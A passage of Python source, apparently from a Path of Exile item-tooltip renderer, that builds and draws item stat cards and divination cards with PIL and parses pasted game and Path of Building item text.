stats.append(self.prop("Cooldown Time: ", f"{item.stats_per_level[0]['cooldown']} sec", None))
if item.cast_time:
stats.append(self.prop("Cast Time: ", f"{item.cast_time} sec", None))
if item.stats_per_level[0]['critical strike chance']:
stats.append(
self.prop("Critical Strike Chance: ", f"{item.stats_per_level[0]['critical strike chance']}%", None)
)
if item.stats_per_level[0]['damage effectiveness']:
stats.append(
self.prop("Damage Effectiveness: ", f"{item.stats_per_level[0]['damage effectiveness']}%", None)
)
stats.append(separator)
elif item.base == 'Prophecy':
if len(item.lore.split(' ')) > 7:
lore = item.lore.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
else:
stats.append(self.prop('Lore', item.lore, UNIQUE_COLOR))
stats.append(separator)
obj_list, matches = unescape_to_list(item.objective, ret_matches=True)
if 'while holding' in obj_list[0]:
item_name = matches[3].split('|')[1].strip(']]')
pre_holding = obj_list[0].split(' while holding ')[0]
new_obj = f"{pre_holding} while holding {item_name}"
else:
new_obj = obj_list[0]
if len(new_obj.split(' ')) > 7:
obj_split = new_obj.split(' ')
obj_sep = [obj_split[x:x + 7] for x in range(0, len(obj_split), 7)]
for line in obj_sep:
stats.append(self.prop(' '.join(line), '', None))
else:
stats.append(self.prop(new_obj, '', None))
stats.append(separator)
stats.append(self.prop("Seal Cost: ", item.seal_cost, DESC_COLOR))
if item.requirements.has_reqs and item.base != "Prophecy":
reqs = {}
if item.requirements.level:
reqs['level'] = item.requirements.level
if item.requirements.str:
reqs['str'] = item.requirements.str
if item.requirements.dex:
reqs['dex'] = item.requirements.dex
if item.requirements.int:
reqs['int'] = item.requirements.int
stats.append(self.prop("Requires", reqs, None))
stats.append(separator)
try:
if item.enchant:
stats.append(self.prop(item.enchant, '', CRAFTED))
stats.append(separator)
except AttributeError:
pass
if 'gem' in item.tags:
if len(item.description.split(' ')) > 7:
desc = item.description.split(' ')
description = [desc[x:x + 7] for x in range(0, len(desc), 7)]
for line in description:
stats.append(self.prop(' '.join(line), '', GEM_COLOR))
else:
stats.append(self.prop(item.description, '', GEM_COLOR))
stats.append(separator)
if item.quality_bonus:
stats.append(self.prop("Per 1% Quality:", "", DESC_COLOR))
if '<br>' in item.quality_bonus:
for bonus in item.quality_bonus.split('<br>'):
stats.append(self.prop(bonus, "", PROP_COLOR))
else:
stats.append(self.prop(item.quality_bonus, "", PROP_COLOR))
stats.append(separator)
stat_text = item.stat_text.split("<br>")
for stat in stat_text:
if len(stat.split(' ')) > 7:
st = stat.split(' ')
sep_stat = [st[x:x + 7] for x in range(0, len(st), 7)]
for sep in sep_stat:
stats.append(self.prop(' '.join(sep), "", PROP_COLOR))
else:
stats.append(self.prop(stat, "", PROP_COLOR))
stats.append(separator)
stats.append(self.prop("Gem Help", "Place into an item socket of the right", DESC_COLOR))
stats.append(self.prop("Gem Help", "colour to gain this skill. Right click to", DESC_COLOR))
stats.append(self.prop("Gem Help", "remove from a socket.", DESC_COLOR))
if 'gem' not in item.tags and item.base != "Prophecy":
if item.implicits:
implicits = unescape_to_list(item.implicits)
else:
implicits = None
if item.explicits:
explicits = unescape_to_list(item.explicits)
else:
explicits = None
if explicits and explicits[0].startswith('{'):
implicits = [explicits[0]]
explicits.pop(0)
if implicits:
for implicit in implicits:
if "{crafted}" in implicit or "(enchant)" in implicit:
stats.append(self.prop(implicit.replace('{crafted}', '').replace('(enchant)', ''),
'', CRAFTED))
stats.append(separator)
else:
stats.append(self.prop(implicit.replace('(implicit)', ''), '', PROP_COLOR))
stats.append(separator)
if explicits:
for explicit in explicits:
if explicit.lower() == "corrupted":
stats.append(self.prop(explicit, '', CORRUPTED))
elif "(crafted)" in explicit or "{crafted}" in explicit:
stats.append(self.prop(explicit.replace('{crafted}', '').replace(' (crafted)', ''),
'', CRAFTED))
else:
stats.append(self.prop(explicit, '', PROP_COLOR))
if item.lore:
if stats[-1] is not separator:
stats.append(separator)
lore = self.prop('Lore', unescape_to_list(item.lore), UNIQUE_COLOR)
stats.append(lore)
if item.icon:
http = urllib3.PoolManager()
def ico(icon):
r = http.request('GET', icon, preload_content=False)
im = Image.open(BytesIO(r.read()))
im = im.convert('RGBA')
return im
try:
if item.skill_icon:
stats.append(self.prop('Image', ico(item.skill_icon), None))
except AttributeError:
pass
stats.append(self.prop('Image', ico(item.icon), None))
else:
if item.name:
stats.append(self.prop('', item.name, DESC_COLOR))
passive_type = None
if item.asc_class:
passive_type = f"{item.asc_class} Notable Passive Skill"
elif item.is_notable:
passive_type = "Notable Passive Skill"
elif item.is_keystone:
passive_type = "Keystone"
stats.append(self.prop(passive_type, '', NORMAL_COLOR))
for line in unescape_to_list(item.stat_text):
stats.append(self.prop(line, '', PROP_COLOR))
if item.icon:
http = urllib3.PoolManager()
def ico(icon):
r = http.request('GET', icon, preload_content=False)
im = Image.open(BytesIO(r.read()))
im = im.convert('RGBA')
return im
try:
# FIXME: unresolved attribute
if item.skill_icon:
stats.append(self.prop('Image', ico(item.skill_icon), None))
except AttributeError:
pass
stats.append(self.prop('Image', ico(item.icon), None))
if item.reminder_text:
lines = unescape_to_list(item.reminder_text)
for line in lines:
if len(line.split(' ')) > 7:
lore = line.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for set_line in sep_lore:
stats.append(self.prop('Reminder', ' '.join(set_line), DESC_COLOR))
else:
stats.append(self.prop("Reminder", line, DESC_COLOR))
if item.flavor_text:
if len(item.flavor_text.split(' ')) > 7:
lore = item.flavor_text.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
else:
stats.append(self.prop("Lore", item.flavor_text, UNIQUE_COLOR))
return stats
def render_divcard(self, card):
http = urllib3.PoolManager()
r = http.request('GET', card.card_art, preload_content=False)
art = Image.open(BytesIO(r.read()))
art = art.convert('RGBA')
item = Image.new('RGBA', self.div_frame.size, (255, 0, 0, 0))
cur = Cursor(self.div_frame.size[0] // 2)
cur.reset_x()
cur.move_x((art.size[0] // 2) * -1)
cur.move_y(47)
item.alpha_composite(art, cur.pos)
item.alpha_composite(self.div_frame, (0, 0))
cur.reset_x()
d = ImageDraw.Draw(item)
cur.y = 0
cur.move_y(20)
header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
cur.move_x((header_font.getsize(card.name)[0] // 2) * -1)
d.text(cur.pos, card.name, fill='black', font=header_font)
cur.reset_x()
cur.x = 77
cur.y = 316
cur.move_x((self.font.getsize(card.stack_size)[0] // 2) * -1)
d.text(cur.pos, card.stack_size, fill=None, font=self.font)
cur.y = 384
cur.reset_x()
fill = flavor_color[card.reward_flavor]
cur.move_x((self.font.getsize(card.reward)[0] // 2) * -1)
d.text(cur.pos, card.reward, fill=fill, font=self.font)
cur.reset_x()
if card.is_corrupted:
cur.y = 384 + self.font.getsize(card.reward)[1] + 6
cur.move_x((self.font.getsize("Corrupted")[0] // 2) * -1)
d.text(cur.pos, "Corrupted", fill=CORRUPTED, font=self.font)
cur.reset_x()
cur.y = 536
first_lore = unescape_to_list(card.lore)
for first_line in first_lore:
text = first_line
if len(text.split(' ')) > 7:
lore = text.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
joined_line = ' '.join(line)
cur.move_y(STAT_SPACING)
cur.move_x((self.font.getsize(joined_line)[0] // 2) * -1)
d.text(cur.pos, joined_line, fill=UNIQUE_COLOR, font=self.lore_font)
cur.move_y(self.lore_font.getsize(joined_line)[1])
cur.reset_x()
else:
cur.move_y(STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, text, fill=UNIQUE_COLOR, font=self.lore_font)
cur.move_y(self.lore_font.getsize(text)[1])
cur.reset_x()
return item
def render(self, poe_item):
stats = self.sort_stats(poe_item)
fill = flavor_color[self.flavor]
try:
if self.header_font.getsize(poe_item.name) > self.header_font.getsize(poe_item.base):
header = poe_item.name
else:
header = poe_item.base
except (AttributeError, TypeError):
header = poe_item.name
box_size = self.calc_size(stats, header)
center_x = box_size[0] // 2
item = Image.new('RGBA', box_size, color='black')
cur = Cursor(center_x)
if not isinstance(poe_item, PassiveSkill):
try:
if poe_item.influences:
apply_influences = []
for influence in poe_item.influences:
if influence == "shaper":
apply_influences.append(self.shaper_badge)
elif influence == "elder":
apply_influences.append(self.elder_badge)
elif influence == "redeemer":
apply_influences.append(self.redeemer_badge)
elif influence == "crusader":
apply_influences.append(self.crusader_badge)
elif influence == "hunter":
apply_influences.append(self.hunter_badge)
elif influence == "warlord":
apply_influences.append(self.warlord_badge)
if poe_item.rarity.lower() in ['rare', 'unique', 'relic']:
self.namebar_left.alpha_composite(apply_influences[0], (8, 18))
if len(apply_influences) > 1:
self.namebar_right.alpha_composite(apply_influences[1], (9, 18))
else:
self.namebar_right.alpha_composite(apply_influences[0], (9, 18))
else:
self.namebar_left.alpha_composite(apply_influences[0], (4, 6))
if len(apply_influences) > 1:
self.namebar_right.alpha_composite(apply_influences[1], (1, 6))
else:
self.namebar_right.alpha_composite(apply_influences[0], (1, 6))
except AttributeError:
pass
item.paste(self.namebar_left, cur.pos)
cur.move_x(self.namebar_left.size[0])
transformed_namebar = self.namebar_trans.resize((item.size[0] - (self.namebar_left.size[0] * 2),
self.namebar_trans.size[1]))
item.paste(transformed_namebar, cur.pos)
cur.move_x(transformed_namebar.size[0])
item.paste(self.namebar_right, cur.pos)
cur.reset_x()
d = ImageDraw.Draw(item)
cur.move_y(8)
cur.move_x((self.header_font.getsize(poe_item.name)[0] // 2) * -1)
d.text(cur.pos, poe_item.name, fill=fill, font=self.header_font)
if not isinstance(poe_item, PassiveSkill):
cur.move_y(2 + self.header_font.getsize(poe_item.name)[1])
else:
cur.move_y(self.header_font.getsize(poe_item.name)[1] // 2)
cur.reset_x()
if not isinstance(poe_item, PassiveSkill):
if 'gem' not in poe_item.tags and poe_item.base != "Prophecy":
if poe_item.base not in poe_item.name:
cur.move_x((self.header_font.getsize(poe_item.base)[0] // 2) * -1)
d.text(cur.pos, poe_item.base, fill=fill, font=self.header_font)
cur.reset_x()
cur.y = 0
# FIXME: referenced before assignment
cur.move_y(transformed_namebar.size[1])
else:
pass
for stat in stats:
if stat.title == "Separator":
self.last_action = "Separator"
cur.move_x((self.separator.size[0] // 2) * -1)
cur.move_y(SEPARATOR_SPACING + 2)
item.paste(self.separator, cur.pos)
cur.reset_x()
elif stat.title == "Elemental Damage:":
stat_text = stat.title
for element in stat.text.keys():
stat_text += f" {stat.text[element]}"
cur.move_x((self.font.getsize(stat_text)[0] // 2) * -1)
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
for element in stat.text.keys():
d.text(cur.pos, f" {stat.text[element]}", fill=ELE_COLOR[element], font=self.font)
cur.move_x(self.font.getsize(f" {stat.text[element]}")[0])
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
elif stat.title == "Requires":
text = stat.title
for attr in stat.text.keys():
text += f" {attr.title()} {stat.text[attr]}" \
f"{'' if list(stat.text.keys())[-1] == attr else ','}"
cur.move_y(0 if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
for attr in stat.text.keys():
if attr == 'level':
d.text(cur.pos, f" {attr.title()}", fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(f" {attr.title()}")[0])
attribute_final = f" {stat.text[attr]}" \
f"{'' if list(stat.text.keys())[-1] == attr else ','}"
d.text(cur.pos, attribute_final, font=self.font)
else:
d.text(cur.pos, f" {stat.text[attr]}", font=self.font)
cur.move_x(self.font.getsize(f" {stat.text[attr]}")[0])
attribute_final = f" {attr.title()}{'' if list(stat.text.keys())[-1] == attr else ','}"
d.text(cur.pos, attribute_final, font=self.font, fill=DESC_COLOR)
cur.move_x(self.font.getsize(attribute_final)[0])
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
elif stat.title == "Lore" or stat.title == "Reminder":
if type(stat.text) is list:
for line in stat.text:
text = line
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, text, fill=stat.color, font=self.lore_font)
cur.move_y(self.lore_font.getsize(text)[1])
cur.reset_x()
self.last_action = ""
else:
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
d.text(cur.pos, stat.text, fill=stat.color, font=self.lore_font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
elif stat.title == "Image" and not isinstance(poe_item, PassiveSkill):
cur.move_x((stat.text.size[0] // 2) * -1)
cur.move_y(4)
ic = stat.text
if not isinstance(poe_item, Gem) and 'shaper' in poe_item.influences:
ic = Image.alpha_composite(self.shaper_backgrounds[poe_item.size].resize(ic.size), ic)
if not isinstance(poe_item, Gem) and 'elder' in poe_item.influences:
ic = Image.alpha_composite(self.elder_backgrounds[poe_item.size].resize(ic.size), ic)
item.alpha_composite(ic, cur.pos)
cur.move_y(stat.text.size[1])
cur.reset_x()
elif stat.title == "Image" and isinstance(poe_item, PassiveSkill):
ic = stat.text
if poe_item.asc_class:
frame = self.ascendancy_frame
elif poe_item.is_keystone:
frame = self.keystone_frame
elif poe_item.is_notable:
frame = self.notable_frame
else:
frame = self.passive_frame
icl = round(math.sqrt((frame.size[0] ** 2) / 2))
old_s = ic.size[0]
ic = ic.resize((icl, icl))
cur.move_x((ic.size[0] // 2) * -1)
cur.move_y(30)
item.alpha_composite(ic, cur.pos)
cur.move_y(((old_s + 26 - ic.size[0]) // 2) * -1)
cur.reset_x()
cur.move_x((frame.size[0] // 2) * -1)
item.alpha_composite(frame, cur.pos)
cur.move_y(frame.size[1])
cur.reset_x()
elif stat.title == "Stored Uses":
text = f"Can Store {stat.text} Use(s)"
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, "Can Store ", fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize("Can Store ")[0])
d.text(cur.pos, stat.text + " ", font=self.font)
cur.move_x(self.font.getsize(stat.text + " ")[0])
d.text(cur.pos, "Use(s)", fill=DESC_COLOR, font=self.font)
cur.reset_x()
elif stat.title == "Gem Help":
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
d.text(cur.pos, stat.text, fill=DESC_COLOR, font=self.lore_font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
elif stat.title == "Seal Cost: ":
coin = Image.open(f'{_dir}//silver_coin.png').convert('RGBA')
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.title)[0] // 2) * -1)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_y(STAT_HEIGHT + STAT_SPACING)
cur.reset_x()
sealtext = f"{stat.text}X Silver Coin"
cur.move_x((self.font.getsize(sealtext)[0] // 2) * -1)
d.text(cur.pos, f"{stat.text}X ", fill=NORMAL_COLOR, font=self.font)
cur.move_x(self.font.getsize(f"{stat.text}X ")[0])
item.alpha_composite(coin, cur.pos)
cur.move_x(coin.size[0] + 2)
d.text(cur.pos, "Silver Coin", fill=NORMAL_COLOR, font=self.font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
else:
text = f"{stat.title}{stat.text}"
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
if ':' in stat.title:
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
d.text(cur.pos, str(stat.text), fill=stat.color, font=self.font)
else:
if stat.title.startswith('{'):
color = CRAFTED
else:
color = stat.color
d.text(cur.pos, stat.title, fill=color, font=self.font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
item = ImageOps.expand(item, border=1, fill=fill)
return item
def parse_game_item(itemtext):
item = itemtext.split('\n')
groups = []
curr_group = []
for line in item:
if "---" in line:
groups.append(curr_group)
curr_group = []
else:
curr_group.append(line)
groups.append(curr_group)
pobitem = {'name': '', 'special': [], 'enchant': [],
'implicit': [], 'stats': [], 'quality': 0, 'type': "game"}
unmarked_blocks = 0
print(item, groups)
for group in groups:
if group[0].startswith('Rarity:'):
pobitem['rarity'] = group[0].split(' ')[1].title()
pobitem['base'] = group[len(group)-1]
if 'Superior' in pobitem['base']:
pobitem['base'] = pobitem['base'].replace('Superior ', '')
if 'Synthesised' in pobitem['base']:
# is there a special nature for Synthesised items?
# if yes: pobitem['special'].append('Synthesised Item')
pobitem['base'] = pobitem['base'].replace('Synthesised', '')
if len(group) > 2:
pobitem['name'] = group[1]
# defense
elif ( group[0].startswith('Quality') or
group[0].startswith('Map Tier:') or
group[0].startswith('Chance to Block:') or
group[0].startswith('Armour:') or
group[0].startswith('Evasion Rating:') or
group[0].startswith('Energy Shield:')):
for line in group:
if line.startswith('Quality:'):
pobitem['quality'] = line.replace('Quality: +', '').replace('% (augmented)', '')
elif ( line.startswith('Map Tier:') or
line.startswith('Item Quantity:') or
line.startswith('Item Rarity:') or
line.startswith('Monster Pack Size:') or
line.startswith('Atlas Region:')): # map stuff
pobitem['implicit'].append(line)
elif line.startswith('Quality ('): # catalysts
pobitem['implicit'].append(line)
# offense
elif group[len(group)-1].startswith('Attacks per Second:') or group[len(group)-1].startswith('Weapon Range:'):
# this filter is not trivial and not fully tested, due to large differences in weapon types and unique exceptions
# trivial solution would be to check for every weapon type in the game
pass
elif group[0].startswith('Requirements:'):
pass
elif group[0].startswith('Sockets:'):
pass
elif group[0].startswith('Item Level:'):
pass
elif group[0].startswith('Price:'):
pass
elif group[0].endswith('(enchant)'):
for line in group:
pobitem['enchant'].append(line.replace('(enchant)', ''))
elif group[0].endswith('(implicit)'):
for line in group:
pobitem['implicit'].append(line.replace('(implicit)', ''))
elif group[0].startswith('Corrupted'):
# should corrupted be an explicit?
pobitem['stats'].append('Corrupted')
elif group[0].endswith(' Item'):
for line in group:
pobitem['special'].append(line)
else: # unid is an explicit
# if (groups.index(group) < len(group)-1) or len(pobitem['stats']) == 0:
if (unmarked_blocks == 0):
unmarked_blocks += 1
print("appending stats")
for line in group:
print(line)
pobitem['stats'].append(line)
else: # flavor
pass
print(pobitem)
return {
'name': pobitem['name'], 'base': pobitem['base'], 'stats': pobitem['stats'], 'rarity': pobitem['rarity'],
'implicits': pobitem['implicit'], 'quality': pobitem['quality'], 'special': pobitem['special'],
'enchant': pobitem['enchant']
}
def parse_pob_item(itemtext):
if "Implicits: " not in itemtext:
print("not in")
return parse_game_item(itemtext)
item = itemtext.split('\n')
item = [line for line in item if "---" not in line]
qualtext = 0
variant = None
pobitem = {'special': [], 'enchant': "", 'type': None}
for index, line in enumerate(item):
if "{variant:" in line:
variant_now = line[line.index("t:") + 2:line.index("}")].split(',')
if variant not in variant_now:
item.pop(index)
continue
line = item[index] = line.split("}", 1)[1]
if "{range:" in line:
try:
percent = float(line[line.index("e:") + 2:line.index("}")])
except Exception:
pass
txt = line.split("}")[1]
matches = re_range.findall(txt)
for match in matches:
stat = match[1:-1]
if " to " in stat:
separator = stat.find(' to ', 1)
range_end = stat[separator + 4:]
else:
separator = stat.find('-', 1)
range_end = stat[separator + 1:]
range_start = stat[:separator]
if '.' in range_start or '.' in range_end:
# FIXME: referenced before assignment
calc_stat = float(percent * float(range_end))
else:
calc_stat = int(percent * float(range_end))
txt = txt.replace(match, str(calc_stat))
item[index] = txt
if line.startswith("Rarity"):
pobitem['rarity'] = line.split(' ')[1].title()
pobitem['rarity_index'] = index
continue
elif line.startswith("Selected Variant"):
variant = line.split(": ")[1]
continue
# elif line.startswith("Item Level"):
# pobitem['type'] = "game"
# if item[index + 3].startswith('--'):
# offset = 2
# if "(implicit)" not in item[index + offset]:
# pobitem['enchant'] = item[index + offset]
# offset = 4
# if "(implicit)" in item[index + offset]:
# pobitem['implicits'] = 0
# for line_inner in item[index + offset:]:
# print(line_inner)
# if "(implicit)" in line_inner:
# pobitem['implicits'] = pobitem['implicits'] + 1
# if "---" in line_inner:
# break
# pobitem['statstart_index'] = index + offset + pobitem['implicits']
# else:
# pobitem['statstart_index'] = index + offset
# else:
# pobitem['statstart_index'] = index + 2
elif line.startswith("====="):
pobitem['statstart_index'] = index
elif line.startswith("Implicits:") and 'implicits' not in pobitem:
pobitem['type'] = 'pob'
pobitem['implicits'] = int(line.split(': ')[1])
pobitem['statstart_index'] = index + pobitem['implicits']
elif "(enchant)" in line or "(implicit)" in line:
if 'implicits' not in pobitem:
pobitem['implicits'] = 1
else:
pobitem['implicits'] = pobitem['implicits'] + 1
pobitem['statstart_index'] = index
elif line.startswith("Requires"):
pobitem['statstart_index'] = index
elif line.startswith("Quality"):
try:
qualtext = line.split("+")[1].split(' ')[0].strip('%')
except IndexError:
pass
if "Shaper Item" in line:
pobitem['special'].append("Shaper Item")
if "Elder Item" in line:
pobitem['special'].append("Elder Item")
if "Crusader Item" in line:
pobitem['special'].append("Crusader Item")
if "Redeemer Item" in line:
pobitem['special'].append("Redeemer Item")
if "Warlord Item" in line:
pobitem['special'].append("Warlord Item")
if "Hunter Item" in line:
pobitem['special'].append("Hunter Item")
if pobitem['rarity'].lower() in ['unique', 'rare', 'relic']:
name = item[pobitem['rarity_index'] + 1]
base = item[pobitem['rarity_index'] + 2]
elif pobitem['rarity'].lower() == 'magic':
name = item[pobitem['rarity_index'] + 1]
if "Superior" in name:
name = name.replace("Superior", "").strip()
base = get_base_from_magic(name)
else:
name = item[pobitem['rarity_index'] + 1]
if "Superior" in name:
name = name.replace("Superior", "").strip()
base = name
if 'implicits' in pobitem and pobitem['implicits']:
if pobitem['type'] == 'game':
offset = 0
else:
offset = 1
implicits = item[:pobitem['statstart_index'] + offset][-1 * pobitem['implicits']:]
implicits = [implicit.replace('(implicit)', '') for implicit in implicits]
elif item[pobitem['statstart_index'] - 2].startswith('--') and 'Item Level' not in item[pobitem['statstart_index'] - 1]:
imp_end = "None"
for ind, stat in enumerate(item[pobitem['statstart_index'] - 1:]):
if stat.startswith('--'):
if item[pobitem['statstart_index'] - 1:][ind + 1] not in ['Shaper Item', 'Elder Item']:
imp_end = ind - 1
break
if imp_end != "None":
implicits = item[pobitem['statstart_index'] - 1:][0:imp_end]
else:
implicits = []
else:
implicits = []
stat_text = item[pobitem['statstart_index'] + 1:]
stat_text = [stat for stat in stat_text if not stat.startswith('--')
and not ":" in stat and stat]
if '(' in base and ')' in base:
base = base[:base.find('(') - 1]
if "Synthesised" in base:
base = base.replace("Synthesised", "").strip()
if "Synthesised" in name:
name = name.replace("Synthesised", "").strip()
print(implicits, stat_text)
return {
'name': name, 'base': base, 'stats': stat_text, 'rarity': pobitem['rarity'],
'implicits': implicits, 'quality': int(qualtext), 'special': pobitem['special'],
'enchant': pobitem['enchant']
}
def ensure_rangeless(stat):
if "-" in str(stat):
return stat.split('-')[0][1:]
return stat
def modify_base_stats(item):
stats = {
'flat es': 0, 'flat armour': 0, 'flat evasion': 0, 'inc es': int(item.quality),
'inc armour': int(item.quality), 'inc evasion': int(item.quality), 'aspd': 0,
'fire low': 0, 'fire max': 0, 'fire inc': 0, 'cold low': 0, 'cold max': 0,
'cold inc': 0, 'light low': 0, 'light max': 0, 'light inc': 0, 'chaos low': 0,
'chaos max': 0, 'chaos inc': 0, 'phys low': 0, 'phys max': 0, 'phys inc': int(item.quality),
'cc': 0, 'range': 0, 'block': 0
}
if item.implicits:
for stat in unescape_to_list(item.implicits):
text = stat.lower().replace('{crafted}', '').replace('{fractured}', '')
if not any(c.isdigit() for c in text) or 'minion' in text or 'global' in text:
continue
if ' per ' in text or ' if ' in text or ',' in text:
continue
if " to " in text and "multiplier" not in text and ":" not in text:
if 'armour' in text and isinstance(item, Armour):
stats['flat armour'] += int(text.split(' ')[0][1:])
elif 'evasion rating' in text and isinstance(item, Armour):
stats['flat evasion'] += int(text.split(' ')[0][1:])
elif 'maximum energy shield' in text and isinstance(item, Armour):
stats['flat es'] += int(text.split(' ')[0][1:])
elif 'weapon range' in text and isinstance(item, Weapon):
stats['range'] += int(text.split(' ')[0][1:])
elif 'block' in text and 'spell damage' not in text and 'block recovery' not in text and \
"maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "damage" in text and "reflect" not in text and "converted" not in text and isinstance(item, Weapon):
k = None
if 'lightning' in text:
k = 'light'
if 'cold' in text:
k = 'cold'
if 'fire' in text:
k = 'fire'
if 'chaos' in text:
k = 'chaos'
if 'physical' in text:
k = 'phys'
if k:
stats[f'{k} low'] += int(text.split(' to ')[0].split(' ')[-1])
stats[f'{k} max'] += int(text.split(' to ')[1].split(' ')[0])
elif " increased " in text:
if "armour" in text and isinstance(item, Armour):
stats['inc armour'] += int(text.split(' ')[0][:-1])
if "evasion rating" in text and isinstance(item, Armour):
stats['inc evasion'] += int(text.split(' ')[0][:-1])
if "energy shield" in text and isinstance(item, Armour):
stats['inc es'] += int(text.split(' ')[0][:-1])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text and \
"maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "attack speed" in text and isinstance(item, Weapon):
stats['aspd'] += int(text.split(' ')[0][:-1])
if "critical strike chance" in text and isinstance(item, Weapon):
stats['cc'] += int(text.split(' ')[0][:-1])
if "damage" in text and isinstance(item, Weapon):
if 'lightning' in text:
stats['light inc'] += int(text.split(' ')[0][:-1])
if 'cold' in text:
stats['cold inc'] += int(text.split(' ')[0][:-1])
if 'fire' in text:
stats['fire inc'] += int(text.split(' ')[0][:-1])
if 'chaos' in text:
stats['chaos inc'] += int(text.split(' ')[0][:-1])
if 'physical' in text:
stats['phys inc'] += int(text.split(' ')[0][:-1])
if item.explicits:
for stat in unescape_to_list(item.explicits):
text = stat.lower().replace('{crafted}', '').replace('{fractured}', '')
if not any(c.isdigit() for c in text) or 'minion' in text or 'global' in text:
continue
if ' per ' in text or ' if ' in text or ',' in text:
continue
if " to " in text and "multiplier" not in text and ":" not in text:
if 'armour' in text and isinstance(item, Armour):
stats['flat armour'] += int(text.split(' ')[0][1:])
elif 'evasion rating' in text and isinstance(item, Armour):
stats['flat evasion'] += int(text.split(' ')[0][1:])
elif 'maximum energy shield' in text and isinstance(item, Armour):
stats['flat es'] += int(text.split(' ')[0][1:])
elif 'weapon range' in text and isinstance(item, Weapon):
stats['range'] += int(text.split(' ')[0][1:])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text \
and "maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "damage" in text and "reflect" not in text and "converted" not in text and isinstance(item, Weapon):
k = None
if 'lightning' in text:
k = 'light'
if 'cold' in text:
k = 'cold'
if 'fire' in text:
k = 'fire'
if 'chaos' in text:
k = 'chaos'
if 'physical' in text:
k = 'phys'
if k:
stats[f'{k} low'] += int(text.split(' to ')[0].split(' ')[-1])
stats[f'{k} max'] += int(text.split(' to ')[1].split(' ')[0])
elif " increased " in text:
if "armour" in text and isinstance(item, Armour):
stats['inc armour'] += int(text.split(' ')[0][:-1])
if "evasion rating" in text and isinstance(item, Armour):
stats['inc evasion'] += int(text.split(' ')[0][:-1])
if "energy shield" in text and isinstance(item, Armour):
stats['inc es'] += int(text.split(' ')[0][:-1])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "attack speed" in text and isinstance(item, Weapon):
stats['aspd'] += int(text.split(' ')[0][:-1])
if "critical strike chance" in text and isinstance(item, Weapon):
stats['cc'] += int(text.split(' ')[0][:-1])
if "damage" in text and isinstance(item, Weapon):
if 'lightning' in text:
stats['light inc'] += int(text.split(' ')[0][:-1])
if 'cold' in text:
stats['cold inc'] += int(text.split(' ')[0][:-1])
if 'fire' in text:
stats['fire inc'] += int(text.split(' ')[0][:-1])
if 'chaos' in text:
stats['chaos inc'] += int(text.split(' ')[0][:-1])
if 'physical' in text:
stats['phys inc'] += int(text.split(' ')[0][:-1])
if 'weapon' in item.tags:
if stats['aspd']:
_as = float(ensure_rangeless(item.attack_speed))
item.attack_speed = f"{(_as + (stats['aspd'] / 100) * _as):.2}"
if stats['cc']:
cc = 5.0
cc += cc * (stats['cc'] / 100)
item.critical_chance = f"{cc:.2}%"
if stats['range']:
i_range = int(ensure_rangeless(item.range))
i_range += stats['range']
item.range = f"{i_range}"
if stats['fire max'] or stats['fire inc']:
if stats['fire max']:
item.fire_min = stats['fire low']
item.fire_max = stats['fire max']
fire_m = int(ensure_rangeless(item.fire_min))
fire_mx = int(ensure_rangeless(item.fire_max))
fire_m += fire_m * (stats['fire inc'] / 100)
fire_mx += fire_mx * (stats['fire inc'] / 100)
item.fire_min = str(round(fire_m))
item.fire_max = str(round(fire_mx))
if stats['cold max'] or stats['cold inc']:
if stats['cold max']:
item.cold_min = stats['cold low']
item.cold_max = stats['cold max']
cold_m = int(ensure_rangeless(item.cold_min))
cold_mx = int(ensure_rangeless(item.cold_max))
cold_m += cold_m * (stats['cold inc'] / 100)
cold_mx += cold_mx * (stats['cold inc'] / 100)
item.cold_min = str(round(cold_m))
